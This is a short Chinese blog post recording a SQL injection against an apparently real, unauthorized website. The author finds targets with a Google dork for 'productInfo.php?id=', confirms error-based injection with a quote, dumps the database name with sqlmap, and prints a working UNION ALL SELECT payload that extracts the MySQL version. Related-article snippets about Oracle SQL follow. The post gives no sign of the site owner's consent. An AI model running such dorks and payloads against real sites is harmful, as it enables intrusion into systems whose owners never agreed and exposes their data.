首页 > 数据库 >一次SQL注入实战记录

一次SQL注入实战记录

时间:2024-04-07 18:11:33浏览次数:27  
标签:实战 sqlmap 记录 数据库 SQL NULL id 注入

一、在Google浏览器用inurl搜索语法寻找目标

inrul:productInfo.php?id=

二、随便点开几个连接,目标出现了

image

给id参数加单引号',页面不正常了,在上方还出现了查询报错的相关信息,相关信息还给出了数据库是MySQL。

image

三、使用sqlmap进行扫描

image

经过小小的等待,有收获了,爆出了数据库名。

image

根据sqlmap的给出paylaod可以进行SQL注入,改变concat函数的参数就可以了手工利用了,如下payload可以爆出数据库版本:

-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-

concat函数的三个参数都是可以回显利用的。

image

到这里SQL注入已经完成了,点到为止。


若有错误,欢迎指正!o( ̄▽ ̄)ブ

标签:实战,sqlmap,记录,数据库,SQL,NULL,id,注入
From: https://www.cnblogs.com/smileleooo/p/18089030

相关文章

  • 【OracleEBS】 科目余额SQL
     selectgb.period_year会计年度,gb.period_name会计期间,gcck.concatenated_segments科目代码,gl_flexfields_pkg.get_description_sql(gcck.chart_of_accounts_id,'',......
  • 【OracleEBS】 用PL/SQL运行工作流
      declarev_itemtypevarchar2(30):='TPLEAVE';--ItemTypeInternalNamv_processvarchar2(30):='DEFAULT_PROCESS';--ProcessNamev_itemkeyvarchar2(30);beginselectrcv_transactions_s.nextvalintov_itemkeyfromd......
  • 【OracleEBS】 在PL/SQL中调用Oracle ERP请求
      procedureprc_do_import_request(prm_orginnumber,prm_appcodeoutnumber,prm_appmsgoutvarchar2)iscustom_exceptionexception;successboolean;v_request_......
  • 【OracleEBS】 订单暂挂问题sql解决
    ---查询请购单的状态select*frompo_requisition_headers_allporwherepor.requisition_header_id=63578;---修改请购单状态为未提交审批updatepo_requisition_headers_allporhsetporh.authorization_status='INCOMPLETE'whereporh.requisition_header_id=6......
  • 数仓调优实战:GUC参数调优
    本文分享自华为云社区《GaussDB(DWS)性能调优系列实战篇七:十八般武艺之GUC参数调优》,作者:黎明的风。1.前言适用版本:【8.1.1及以上】GaussDB(DWS)性能调优系列专题文章,介绍了数据库性能调优的思路和总体策略。在系统级调优中数据库全局的GUC参数对整体性能的提升至关重要,而......
  • mysql使用datetime,java如何保存
    CREATETABLE`user`(```省略部分代码``` `create_time`datetimeNOTNULLCOMMENT'创建时间' ```省略部分代码```)javaclassUser{ privateTimestampcreateTime;}java8importjava.sql.Timestamp;```省略部分代码```LocalDateTimenow=L......
  • mybatis动态sql
    1.if传值判断1.1不为空或null <iftest="cgxs!=nullandcgxs!=''">andcgxs=#{cgxs}</if>1.2传数字判断<iftest="cgxs=='1'">andcgxs=#{cgxs}</if>1.3传字符串判断1.3.1第一种<iftest="cgxs ......
  • ZYNQ学习之Petalinux 设计流程实战
    基本都是摘抄正点原子的文章:<领航者ZYNQ之嵌入式Linux开发指南V3.2.pdf,因初次学习,仅作学习摘录之用,有不懂之处后续会继续更新~PetaLinux工具提供了在Xilinx处理系统上自定义、构建和部署嵌入式Linux解决方案所需的一切。该解决方案旨在提高设计生产力,可与Xilinx硬......
  • Chatgpt掘金之旅—有爱AI商业实战篇|内容策展业务|(八)
    演示站点: https://ai.uaai.cn 对话模块官方论坛: www.jingyuai.com 京娱AI一、AI技术创业内容策展业务有哪些机会?人工智能(AI)技术作为当今科技创新的前沿领域,为创业者提供了广阔的机会和挑战。随着AI技术的快速发展和应用领域的不断拓展,未来AI技术方面会有哪些创业机......
  • SQL Server在所有表中查找(在整个库搜索内容)
     SQLServer在所有表中查找(在整个库搜索内容)declare@Strnvarchar(max),@tableNamevarchar(50),@colNamevarchar(50),@rowCountintselecta.nametableName,b.nameColname,0asIsFoundinto#t1fromsysobjectsajoinsyscolumnsbona.id=b.idjoinsystypes......